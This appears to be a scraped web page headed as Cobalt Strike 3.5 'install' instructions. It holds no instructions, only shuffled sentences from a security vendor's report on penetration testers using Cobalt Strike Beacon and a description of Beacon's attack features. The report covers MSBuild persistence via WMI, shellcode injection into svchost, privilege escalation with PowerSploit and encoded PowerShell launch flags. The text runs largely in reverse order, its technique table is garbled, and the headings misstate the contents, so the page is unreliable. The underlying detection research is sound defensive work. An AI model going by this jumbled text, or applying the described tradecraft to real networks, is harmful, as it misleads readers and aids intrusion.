Remote Services: SMB/Windows Admin Shares
#INSTALL COBALT STRIKE 3.5 WINDOWS#
Process Injection: Proc Memory Native APIĬommand and Scripting Interpreter: PowerShellĬreate or Modify System Process: Windows Service Trusted Developer Utilities Proxy Execution: MSBuild Table 1 maps the observed penetration testing techniques to the MITRE ATT&CK® framework. These anomalous behaviors enable CTU™ researchers to develop countermeasures that can reliably detect the abuse of legitimate Windows utilities for nefarious purposes. Nor is it common for developers to compile and execute binaries over the network using WMI. For example, it is not typical developer behavior to compile binaries as a service that are executed every time a user logs in. These techniques are not common in enterprise environments. This action immediately provided the penetration testers with widespread access to the network. They used WMI to create persistence via a Microsoft Build Engine service that compiles and executes Cobalt Strike Beacon on these hosts.
#INSTALL COBALT STRIKE 3.5 CODE#
This technique enabled them to perform remote code execution on the systems via the Windows Management Instrumentation (WMI) service. They then used the Rundll32 execution utility to inject shellcode into the svchost.exe service host process on those systems. The penetration testers deployed Cobalt Strike Beacon to other hosts in the environment. The observed PowerShell commands used the "-nop -exec bypass -EncodedCommand" parameters followed by a Base64-encoded command, which revealed that they were launched from Cobalt Strike Beacon. The penetration testers then used Cobalt Strike Beacon to execute the PowerSploit exploitation scripting tool's "Install-ServiceBinary" function to obtain SYSTEM-level privileges. This process runs every time a user logs onto the system, injecting the Cobalt Strike Beacon payload into the userinit.exe user initialization process. In one engagement, Secureworks® Counter Threat Unit™ (CTU) researchers observed penetration testers leveraging local administrator access and the Microsoft Build Engine process to compile and execute a Cobalt Strike Beacon payload directly on the host. Legitimate testing typically assumes that the organization has already been breached. As a result, the penetration testers can bypass endpoint countermeasures and security controls that typically detect phishing or malware activity that threat actors use for initial access. Penetration testers are often granted access to internal networks and systems so they can test the security and response of the enterprise. Threat actors typically use malware to gain initial access to the network and subsequently deploy Cobalt Strike.
However, the methods used to access the environment often differ. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.The Cobalt Strike threat emulation framework lets legitimate penetration testers emulate threat actors.
Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP Beacons can be daisy-chained. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine.